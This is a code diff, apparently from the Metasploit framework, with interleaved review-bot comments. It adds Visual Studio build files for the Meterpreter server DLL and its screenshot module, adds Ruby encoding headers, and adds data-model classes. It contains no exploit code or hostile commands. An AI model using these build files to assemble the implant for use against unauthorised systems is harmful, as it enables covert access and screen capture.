{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|x64.ActiveCfg = Release|x64
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|x64.Build.0 = Release|x64
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.ActiveCfg = Debug|Win32
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.ActiveCfg = Debug|x64
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.Build.0 = Debug|x64
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.ActiveCfg = Release|Win32
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.ActiveCfg = Release|x64
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.Build.0 = Release|x64
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.Build.0 = Debug|Win32
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.ActiveCfg = Debug|x64
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.Build.0 = Debug|x64
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = Release|Win32
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.Build.0 = Release|Win32
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.ActiveCfg = Release|x64
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.Build.0 = Release|x64
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.ActiveCfg = Debug|Win32
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.Build.0 = Debug|Win32
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.ActiveCfg = Debug|x64
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.Build.0 = Debug|x64
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.ActiveCfg = Release|Win32
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.Build.0 = Release|Win32
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.ActiveCfg = Release|x64
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.Build.0 = Release|x64
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.ActiveCfg = Debug|Win32
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.Build.0 = Debug|Win32
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.ActiveCfg = Debug|x64
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.Build.0 = Debug|x64
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.ActiveCfg = Release|Win32
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.Build.0 = Release|Win32
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.ActiveCfg = Release|x64
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.Build.0 = Release|x64
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|Win32.ActiveCfg = Debug|Win32
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|Win32.Build.0 = Debug|Win32
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|x64.ActiveCfg = Debug|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|Win32.ActiveCfg = Release|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|Win32.Build.0 = Release|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|x64.ActiveCfg = Release|x64
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|x64.Build.0 = Release|x64
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.ActiveCfg = Debug|Win32
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.Build.0 = Debug|Win32
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.ActiveCfg = Debug|x64
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.Build.0 = Debug|x64
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.ActiveCfg = Release|Win32
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.Build.0 = Release|Win32
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.ActiveCfg = Release|x64
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.Build.0 = Release|x64
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|Win32.ActiveCfg = Release|Win32
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|Win32.Build.0 = Release|Win32
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|x64.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
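Review bot: `Debug|Win32` and `Debug|x64` are removed from `SolutionConfigurationPlatforms`, but the `.vcxproj` files added in the same commit still define both Debug configurations, which can no longer be selected from the solution. They already look unmaintained: the Debug|Win32 linker settings in metsrv.vcxproj search `..\common\Release`, and some Debug post-build steps copy to `..\..\output\client` or `..\..\output\server` where the Release ones copy to `..\..\output\`. Either keep the Debug entries here or drop the Debug configurations from the project files, so that only the build flavour that ships is carried and reviewed. Separately, `{C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|x64.ActiveCfg = Release|Win32` has no matching `Build.0` line, so backcompat is skipped for x64. That is consistent with the x64 link lines that omit `backcompat.lib`, but a sentence in the commit message would save the next reader the check.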
diff --git a/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj b/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj
new file mode 100644
index 0000000000..3f220cba27
--- /dev/null
+++ b/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj
@@ -0,0 +1,373 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
+ metsrv
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/metsrv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ metsrv.h
+ .\Debug/metsrv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ ws2_32.lib;odbc32.lib;odbccp32.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Debug/metsrv.dll
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ true
+ .\Debug/metsrv.pdb
+ false
+
+
+ .\Debug/metsrv.lib
+ MachineX86
+
+
+ true
+ .\Debug/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\debug\metsrv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/metsrv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ metsrv.h
+ .\Debug/metsrv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metsrv.dll
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ true
+ .\Debug/metsrv.pdb
+ false
+
+
+ .\Debug/metsrv.lib
+ MachineX64
+
+
+ true
+ .\Debug/metsrv.bsc
+
+
+ copy debug\metsrv.dll ..\..\output\server
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/metsrv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ Size
+ ..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ false
+ MultiThreaded
+ false
+ Create
+ metsrv.h
+ .\Release/metsrv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\metsrv.dll
+ true
+ ..\backcompat\Release;..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ %(DelayLoadDLLs)
+ false
+ true
+ .\Release/metsrv.map
+ false
+
+
+ .\Release/metsrv.lib
+ MachineX86
+ 5.0
+ Console
+
+
+ true
+ .\Release/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\release\metsrv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/metsrv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ Size
+ ..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ metsrv.h
+ .\Release/metsrv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\metsrv.x64.dll
+ true
+ ..\common\Release;..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ false
+ true
+ .\Release/metsrv.map
+ false
+
+
+ .\Release/metsrv.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\release\metsrv.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
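Review bot: Both Release configurations add `_CRT_SECURE_NO_WARNINGS` to the preprocessor definitions, which silences the compiler's C4996 warnings for the unbounded CRT string and I/O functions across the whole DLL; screenshot.vcxproj later in this diff does the same. metsrv links `ws2_32.lib`, `wininet.lib` and the OpenSSL libraries, so it presumably handles data from the network, which is where those warnings are most useful. I would drop the define from the project and suppress only at call sites that have been reviewed, e.g. `#pragma warning(suppress: 4996)` with a short comment saying why the call is bounded.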
diff --git a/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj b/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj
new file mode 100644
index 0000000000..95c032a381
--- /dev/null
+++ b/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj
@@ -0,0 +1,234 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}
+ screenshot
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Size
+ ..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ Level3
+ ProgramDatabase
+ Cdecl
+ CompileAsC
+ false
+
+
+ backcompat.lib;jpeg.lib;%(AdditionalDependencies)
+ .\release\screenshot.dll
+ ..\backcompat\Release;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+
+
+ false
+ Windows
+ true
+ true
+ true
+ false
+ true
+ MachineX86
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\screenshot.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Size
+ ..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ Level3
+ ProgramDatabase
+ Cdecl
+ CompileAsC
+ false
+
+
+ jpeg.lib;%(AdditionalDependencies)
+ .\release\screenshot.x64.dll
+ ..\..\source\jpeg-8\lib\win\x64;%(AdditionalLibraryDirectories)
+
+
+ false
+ Windows
+ true
+ true
+ true
+ false
+ true
+ MachineX64
+
+
+ copy /y "$(ProjectDir)\release\screenshot.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
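Review bot: The Release link input `jpeg.lib` is resolved from the in-tree directories `..\..\source\jpeg-8\lib\win\x86` and `..\..\source\jpeg-8\lib\win\x64`, which look like prebuilt binaries, and nothing in this project file records which source revision or compiler flags produced them. If the library is not rebuilt from `..\..\source\jpeg-8` as part of the solution, an XML comment next to the dependency would help, for example `<!-- jpeg.lib: prebuilt from SOURCE_VERSION_PLACEHOLDER, SHA-256 HASH_PLACEHOLDER -->`. The same applies to `ssleay32.lib` and `libeay32.lib` in metsrv.vcxproj.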
diff --git a/lib/bit-struct.rb b/lib/bit-struct.rb
index e06723fdc1..0ff621ce07 100644
--- a/lib/bit-struct.rb
+++ b/lib/bit-struct.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# A Convenience to load all field classes and yaml handling.
# XXX: Pretty certian this monkeypatch isn't required in Metasploit.
diff --git a/lib/bit-struct/bit-struct.rb b/lib/bit-struct/bit-struct.rb
index b5bf1a26bc..a96863a5d4 100644
--- a/lib/bit-struct/bit-struct.rb
+++ b/lib/bit-struct/bit-struct.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Class for packed binary data, with defined bitfields and accessors for them.
# See {intro.txt}[link:../doc/files/intro_txt.html] for an overview.
#
diff --git a/lib/bit-struct/char-field.rb b/lib/bit-struct/char-field.rb
index ca75f57e1a..0ceb5a35ed 100644
--- a/lib/bit-struct/char-field.rb
+++ b/lib/bit-struct/char-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for fixed length binary strings of characters.
# Declared with BitStruct.char.
diff --git a/lib/bit-struct/fields.rb b/lib/bit-struct/fields.rb
index 50d7a32ba7..4d581df1a5 100644
--- a/lib/bit-struct/fields.rb
+++ b/lib/bit-struct/fields.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
class << self
# Define a char string field in the current subclass of BitStruct,
diff --git a/lib/bit-struct/float-field.rb b/lib/bit-struct/float-field.rb
index 4365bcd6f3..d7e2e5b092 100644
--- a/lib/bit-struct/float-field.rb
+++ b/lib/bit-struct/float-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for floats (single and double precision) in network order.
# Declared with BitStruct.float.
diff --git a/lib/bit-struct/hex-octet-field.rb b/lib/bit-struct/hex-octet-field.rb
index 516bf05ea6..70c27c218e 100644
--- a/lib/bit-struct/hex-octet-field.rb
+++ b/lib/bit-struct/hex-octet-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/char-field'
class BitStruct
diff --git a/lib/bit-struct/nested-field.rb b/lib/bit-struct/nested-field.rb
index d9e6eb95ce..4182d1f7df 100644
--- a/lib/bit-struct/nested-field.rb
+++ b/lib/bit-struct/nested-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/bit-struct'
class BitStruct
diff --git a/lib/bit-struct/octet-field.rb b/lib/bit-struct/octet-field.rb
index 43ce4a3a29..5967967fc8 100644
--- a/lib/bit-struct/octet-field.rb
+++ b/lib/bit-struct/octet-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/char-field'
class BitStruct
diff --git a/lib/bit-struct/pad-field.rb b/lib/bit-struct/pad-field.rb
index 2561ec2cdf..f01476b23d 100644
--- a/lib/bit-struct/pad-field.rb
+++ b/lib/bit-struct/pad-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for fixed length padding.
class PadField < Field
diff --git a/lib/bit-struct/signed-field.rb b/lib/bit-struct/signed-field.rb
index c46e535ef7..0ab7cd9c19 100644
--- a/lib/bit-struct/signed-field.rb
+++ b/lib/bit-struct/signed-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for signed integers in network order, 1-16 bits, or 8n bits.
# Declared with BitStruct.signed.
diff --git a/lib/bit-struct/text-field.rb b/lib/bit-struct/text-field.rb
index bdb0dfe3fc..b4d8e0cf9e 100644
--- a/lib/bit-struct/text-field.rb
+++ b/lib/bit-struct/text-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for null-terminated printable text strings.
# Declared with BitStruct.text.
diff --git a/lib/bit-struct/unsigned-field.rb b/lib/bit-struct/unsigned-field.rb
index 966cd8020b..c254d99ebc 100644
--- a/lib/bit-struct/unsigned-field.rb
+++ b/lib/bit-struct/unsigned-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for unsigned integers in network order, 1-16 bits, or 8n bits.
# Declared with BitStruct.unsigned.
diff --git a/lib/bit-struct/vector-field.rb b/lib/bit-struct/vector-field.rb
index e05ca67816..b3b8330ebf 100644
--- a/lib/bit-struct/vector-field.rb
+++ b/lib/bit-struct/vector-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/vector'
class BitStruct
diff --git a/lib/bit-struct/vector.rb b/lib/bit-struct/vector.rb
index 0b8edcaade..a3acd63f2f 100644
--- a/lib/bit-struct/vector.rb
+++ b/lib/bit-struct/vector.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# A Vector is, like a BitStruct, a String. It retains all of the String
# methods, except for #[], #[]=, and #each. These methods operate on entries
# instead of chars. Other methods, including #length and #slice, are unchanged.
diff --git a/lib/bit-struct/yaml.rb b/lib/bit-struct/yaml.rb
index a44eb1783c..6f835b943e 100644
--- a/lib/bit-struct/yaml.rb
+++ b/lib/bit-struct/yaml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'yaml'
class BitStruct
diff --git a/lib/fastlib.rb b/lib/fastlib.rb
index aebba24cbd..c709928683 100755
--- a/lib/fastlib.rb
+++ b/lib/fastlib.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# FASTLIB is a mechanism for loading large sets of libraries in a way that is
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb
new file mode 100755
index 0000000000..99c8a5be9d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::ExploitAttempt
+ def self.included(base)
+ base.class_eval {
+ belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :exploit_attempt_count
+ validates :host_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
index 6b40e380bc..6f0186ff41 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
@@ -17,6 +17,9 @@ module MetasploitDataModels::ActiveRecordModels::Host
has_many :creds, :through => :services, :class_name => "Mdm::Cred"
has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost"
+ has_many :host_details, :dependent => :destroy, :class_name => "Mdm::HostDetail"
+ has_many :exploit_attempts, :dependent => :destroy, :class_name => "Mdm::ExploitAttempt"
+
validates :address, :presence => true, :ip_format => true
validates_exclusion_of :address, :in => ['127.0.0.1']
validates_uniqueness_of :address, :scope => :workspace_id, :unless => Proc.new { |host| host.ip_address_invalid? }
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb
new file mode 100755
index 0000000000..e8cc41eb5e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::HostDetail
+ def self.included(base)
+ base.class_eval {
+ belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :host_detail_count
+ validates :host_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb
new file mode 100644
index 0000000000..23e67da6f1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleAction
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_actions"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
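Review bot: `validate :name, :presence => true` does not enforce presence. `validate` registers a method called `name` as a custom validation callback, and `:presence` is not an option it acts on, so a record with a blank name still saves. The line should read `validates :name, :presence => true`. The same line appears in the new module_arch.rb, module_author.rb, module_mixin.rb, module_platform.rb, module_ref.rb and module_target.rb, and as `validate :refname, :presence => true` in module_detail.rb. These files are a bundled copy of the gem, so the correction belongs in the gem source as well.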
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb
new file mode 100644
index 0000000000..656068d39f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleArch
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_archs"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb
new file mode 100644
index 0000000000..b279c88043
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleAuthor
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_authors"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb
new file mode 100755
index 0000000000..503e39869b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb
@@ -0,0 +1,67 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleDetail
+ def self.included(base)
+ base.class_eval {
+ base.table_name = "module_details"
+
+ has_many :authors, :class_name => "Mdm::ModuleAuthor", :dependent => :destroy, :source => :module_author
+ has_many :mixins, :class_name => "Mdm::ModuleMixin", :dependent => :destroy, :source => :module_mixin
+ has_many :targets, :class_name => "Mdm::ModuleTarget", :dependent => :destroy, :source => :module_target
+ has_many :actions, :class_name => "Mdm::ModuleAction", :dependent => :destroy, :source => :module_action
+ has_many :refs, :class_name => "Mdm::ModuleRef", :dependent => :destroy, :source => :module_ref
+ has_many :archs, :class_name => "Mdm::ModuleArch", :dependent => :destroy, :source => :module_arch
